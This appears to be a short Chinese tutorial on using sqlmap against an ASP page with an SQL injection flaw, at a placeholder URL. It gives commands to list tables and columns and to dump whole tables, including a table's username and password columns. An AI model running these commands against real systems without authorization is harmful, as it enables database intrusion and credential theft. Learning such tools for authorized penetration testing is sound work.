首页 > 代码库 > sqlmap测试asp实战
sqlmap测试asp实战
如果检测到某个网址,比如www.XXXXXX.asp?id=26存在sql注入漏洞
爆表名
sqlmap -u "www.XXXXXX.asp?id=26" --tables
线程选10不到1分钟获取到所有表名
爆字段
这里针对book表
sqlmap -u "www.XXXXXX.asp?id=26" --columns -T "book"
线程数选10
同样不到一分钟,book表所有的字段全都爆出来了
获取所有表的内容
sqlmap -u "www.XXXXXX.asp?id=26" --dump
只获取某个表的内容
sqlmap -u "www.XXXXXX.asp?id=26" --dump -T "book"
只获取某个表中某些列的内容
sqlmap -u "www.XXXXXXX.asp?id=26" --dump -C "username,password" -T "book"
sqlmap测试asp实战
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。